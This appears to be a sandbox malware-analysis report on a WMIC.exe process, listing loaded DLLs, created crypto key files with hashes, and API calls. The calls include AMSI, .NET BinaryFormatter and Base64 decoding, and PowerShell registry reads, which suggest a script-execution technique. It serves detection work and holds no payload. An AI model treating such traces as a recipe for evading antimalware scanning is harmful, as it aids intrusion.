amsi.dll	0x7ffbf68c0000	0x7ffbf68cffff	Memory Mapped File	Readable, Writable, Executable	-
wmi2xml.dll	0x7ffbf7780000	0x7ffbf779bfff	Memory Mapped File	Readable, Writable, Executable	-
msoxmlmf.dll	0x7ffbf77c0000	0x7ffbf77d2fff	Memory Mapped File	Readable, Writable, Executable	-
mscoreei.dll	0x7ffbf8a40000	0x7ffbf8ad7fff	Memory Mapped File	Readable, Writable, Executable	-
mscoree.dll	0x7ffbf8ae0000	0x7ffbf8b47fff	Memory Mapped File	Readable, Writable, Executable	-
msxml3.dll	0x7ffbfc900000	0x7ffbfcb3efff	Memory Mapped File	Readable, Writable, Executable	-
framedynos.dll	0x7ffbfe150000	0x7ffbfe19dfff	Memory Mapped File	Readable, Writable, Executable	-
mskeyprotect.dll	0x7ffc03cc0000	0x7ffc03cd3fff	Memory Mapped File	Readable, Writable, Executable	-
ncryptsslp.dll	0x7ffc03d40000	0x7ffc03d5dfff	Memory Mapped File	Readable, Writable, Executable	-
vcruntime140.dll	0x7ffc05ea0000	0x7ffc05eb5fff	Memory Mapped File	Readable, Writable, Executable	-
wmiutils.dll	0x7ffc063e0000	0x7ffc06404fff	Memory Mapped File	Readable, Writable, Executable	-
wbemsvc.dll	0x7ffc06410000	0x7ffc06423fff	Memory Mapped File	Readable, Writable, Executable	-
fastprox.dll	0x7ffc06430000	0x7ffc06525fff	Memory Mapped File	Readable, Writable, Executable	-
wininet.dll	0x7ffc06700000	0x7ffc0698dfff	Memory Mapped File	Readable, Writable, Executable	-
wbemprox.dll	0x7ffc06b80000	0x7ffc06b90fff	Memory Mapped File	Readable, Writable, Executable	-
urlmon.dll	0x7ffc079e0000	0x7ffc07b97fff	Memory Mapped File	Readable, Writable, Executable	-
wbemcomn.dll	0x7ffc07e60000	0x7ffc07edefff	Memory Mapped File	Readable, Writable, Executable	-
version.dll	0x7ffc08000000	0x7ffc08009fff	Memory Mapped File	Readable, Writable, Executable	-
rasadhlp.dll	0x7ffc0ad10000	0x7ffc0ad19fff	Memory Mapped File	Readable, Writable, Executable	-
ondemandconnroutehelper.dll	0x7ffc0b3b0000	0x7ffc0b3c4fff	Memory Mapped File	Readable, Writable, Executable	-
fwpuclnt.dll	0x7ffc0c360000	0x7ffc0c3c6fff	Memory Mapped File	Readable, Writable, Executable	-
winnsi.dll	0x7ffc0c430000	0x7ffc0c43afff	Memory Mapped File	Readable, Writable, Executable	-
iphlpapi.dll	0x7ffc0c8d0000	0x7ffc0c907fff	Memory Mapped File	Readable, Writable, Executable	-
iertutil.dll	0x7ffc0d740000	0x7ffc0dac1fff	Memory Mapped File	Readable, Writable, Executable	-
winhttp.dll	0x7ffc0f200000	0x7ffc0f2c7fff	Memory Mapped File	Readable, Writable, Executable	-
dwmapi.dll	0x7ffc119f0000	0x7ffc11a11fff	Memory Mapped File	Readable, Writable, Executable	-
uxtheme.dll	0x7ffc123a0000	0x7ffc12435fff	Memory Mapped File	Readable, Writable, Executable	-
dnsapi.dll	0x7ffc12490000	0x7ffc12539fff	Memory Mapped File	Readable, Writable, Executable	-
ucrtbase.dll	0x7ffc12bc0000	0x7ffc12cb3fff	Memory Mapped File	Readable, Writable, Executable	-
schannel.dll	0x7ffc12f70000	0x7ffc12fe9fff	Memory Mapped File	Readable, Writable, Executable	-
rsaenh.dll	0x7ffc13030000	0x7ffc13063fff	Memory Mapped File	Readable, Writable, Executable	-
dpapi.dll	0x7ffc13070000	0x7ffc13079fff	Memory Mapped File	Readable, Writable, Executable	-
mswsock.dll	0x7ffc132f0000	0x7ffc1334bfff	Memory Mapped File	Readable, Writable, Executable	-
cryptsp.dll	0x7ffc133a0000	0x7ffc133b6fff	Memory Mapped File	Readable, Writable, Executable	-
cryptbase.dll	0x7ffc134c0000	0x7ffc134cafff	Memory Mapped File	Readable, Writable, Executable	-
ntasn1.dll	0x7ffc13550000	0x7ffc13589fff	Memory Mapped File	Readable, Writable, Executable	-
ncrypt.dll	0x7ffc13590000	0x7ffc135b6fff	Memory Mapped File	Readable, Writable, Executable	-
sspicli.dll	0x7ffc136a0000	0x7ffc136ccfff	Memory Mapped File	Readable, Writable, Executable	-
bcrypt.dll	0x7ffc13950000	0x7ffc13978fff	Memory Mapped File	Readable, Writable, Executable	-
profapi.dll	0x7ffc13a20000	0x7ffc13a33fff	Memory Mapped File	Readable, Writable, Executable	-
powrprof.dll	0x7ffc13a40000	0x7ffc13a8afff	Memory Mapped File	Readable, Writable, Executable	-
msasn1.dll	0x7ffc13a90000	0x7ffc13a9ffff	Memory Mapped File	Readable, Writable, Executable	-
kernel.appcore.dll	0x7ffc13aa0000	0x7ffc13aaefff	Memory Mapped File	Readable, Writable, Executable	-
wintrust.dll	0x7ffc13bf0000	0x7ffc13c44fff	Memory Mapped File	Readable, Writable, Executable	-
windows.storage.dll	0x7ffc13c50000	0x7ffc14293fff	Memory Mapped File	Readable, Writable, Executable	-
crypt32.dll	0x7ffc142c0000	0x7ffc14486fff	Memory Mapped File	Readable, Writable, Executable	-
cfgmgr32.dll	0x7ffc14490000	0x7ffc144d2fff	Memory Mapped File	Readable, Writable, Executable	-
bcryptprimitives.dll	0x7ffc144e0000	0x7ffc14549fff	Memory Mapped File	Readable, Writable, Executable	-
kernelbase.dll	0x7ffc14550000	0x7ffc14737fff	Memory Mapped File	Readable, Writable, Executable	-
shcore.dll	0x7ffc14740000	0x7ffc147f4fff	Memory Mapped File	Readable, Writable, Executable	-
ole32.dll	0x7ffc14800000	0x7ffc14942fff	Memory Mapped File	Readable, Writable, Executable	-
rpcrt4.dll	0x7ffc14950000	0x7ffc14a6bfff	Memory Mapped File	Readable, Writable, Executable	-
shell32.dll	0x7ffc14a70000	0x7ffc15fcefff	Memory Mapped File	Readable, Writable, Executable	-
combase.dll	0x7ffc15fd0000	0x7ffc1624cfff	Memory Mapped File	Readable, Writable, Executable	-
advapi32.dll	0x7ffc16250000	0x7ffc162f6fff	Memory Mapped File	Readable, Writable, Executable	-
msvcrt.dll	0x7ffc164b0000	0x7ffc1654cfff	Memory Mapped File	Readable, Writable, Executable	-
clbcatq.dll	0x7ffc16550000	0x7ffc165f6fff	Memory Mapped File	Readable, Writable, Executable	-
sechost.dll	0x7ffc16660000	0x7ffc166bafff	Memory Mapped File	Readable, Writable, Executable	-
imm32.dll	0x7ffc167d0000	0x7ffc1680afff	Memory Mapped File	Readable, Writable, Executable	-
msctf.dll	0x7ffc16810000	0x7ffc16969fff	Memory Mapped File	Readable, Writable, Executable	-
ws2_32.dll	0x7ffc16970000	0x7ffc169dafff	Memory Mapped File	Readable, Writable, Executable	-
gdi32.dll	0x7ffc169e0000	0x7ffc16b65fff	Memory Mapped File	Readable, Writable, Executable	-
nsi.dll	0x7ffc16fa0000	0x7ffc16fa7fff	Memory Mapped File	Readable, Writable, Executable	-
oleaut32.dll	0x7ffc16fb0000	0x7ffc17070fff	Memory Mapped File	Readable, Writable, Executable	-
kernel32.dll	0x7ffc17120000	0x7ffc171ccfff	Memory Mapped File	Readable, Writable, Executable	-
user32.dll	0x7ffc171d0000	0x7ffc17325fff	Memory Mapped File	Readable, Writable, Executable	-
coml2.dll	0x7ffc17330000	0x7ffc1739efff	Memory Mapped File	Readable, Writable, Executable	-
shlwapi.dll	0x7ffc173a0000	0x7ffc173f1fff	Memory Mapped File	Readable, Writable, Executable	-
ntdll.dll	0x7ffc17400000	0x7ffc175c0fff	Memory Mapped File	Readable, Writable, Executable	-
For performance reasons, the remaining 129 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\programdata\microsoft\crypto\rsa\machinekeys\242a813bf990d2052908c0351b6b0a7a_94f34c22-5cd3-4d50-aa5e-52adff408a05	0.08 KB	MD5: 84440b4d05f45b1e94b2f53f7a581c0a SHA1: 14dc680c6e0a010f1dbe9e635060128f7d567ec7 SHA256: 35361c9d54758eaf6b63855f5063fa44463e40854dc7561c3cad3ddf75834498		... File Actions Show Properties Download
c:\programdata\microsoft\crypto\rsa\machinekeys\242a813bf990d2052908c0351b6b0a7a_94f34c22-5cd3-4d50-aa5e-52adff408a05	2.20 KB	MD5: c33b3b8b65e709d89cd6f0ac2f91f8f4 SHA1: f8e338ee94b8cdf41214ec66a9e853cbfe6ab8cb SHA256: 1a8da512c75bb8ebeee40978fbea2c4f71e724f5cd83498e0714536d8a653787		... File Actions Show Properties Download

Threads

Thread 0x6bc

424

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\windows\system32\wbem\wmic.exe, base_address = 0x7ff66e670000	1	Fn
COM	Create	interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Computer Name	result_out = X2VS1CUM	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54	1	Fn
COM	Create	interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Local Time, time = 2018-06-26 23:00:06 (Local Time)	1	Fn
COM	Create	interface = BFBF883A-CAD7-11D3-A11B-00105A1F515A, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\System32\Wbem\WMIC.exe, size = 260	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffc17120000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffc145c02d0	1	Fn
Module	Load	module_name = amsi.dll, base_address = 0x7ffbf68c0000	1	Fn
Module	Get Address	module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffbf68c2260	1	Fn
Module	Get Address	module_name = c:\windows\system32\amsi.dll, function = AmsiScanString, address_out = 0x7ffbf68c26b0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffc14550000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffc145af670	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffc14611540	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 190843	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
COM	Get Class ID	cls_id = 9E28EF95-9C6F-3A00-B525-36A76178CC9C, prog_id = System.Text.ASCIIEncoding	1	Fn
COM	Get Class ID	cls_id = C1ABB475-F198-39D5-BF8D-330BC7189661, prog_id = System.Security.Cryptography.FromBase64Transform	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	1	Fn
COM	Get Class ID	cls_id = F5E692D9-8A87-349D-9657-F96E5799D2F4, prog_id = System.IO.MemoryStream	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	1	Fn
COM	Get Class ID	cls_id = 50369004-DB9A-3A75-BE7A-1D0EF017B9D3, prog_id = System.Runtime.Serialization.Formatters.Binary.BinaryFormatter	1	Fn
COM	Create	interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	1	Fn
COM	Get Class ID	cls_id = 6896B49D-7AFB-34DC-934E-5ADD38EEEE39, prog_id = System.Collections.ArrayList	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
System	Get Info	type = Operating System	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Windows\System32\Wbem\WMIC.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	12	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules	1	Fn
Environment	Get Environment String	name = MshEnableTrace	8	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
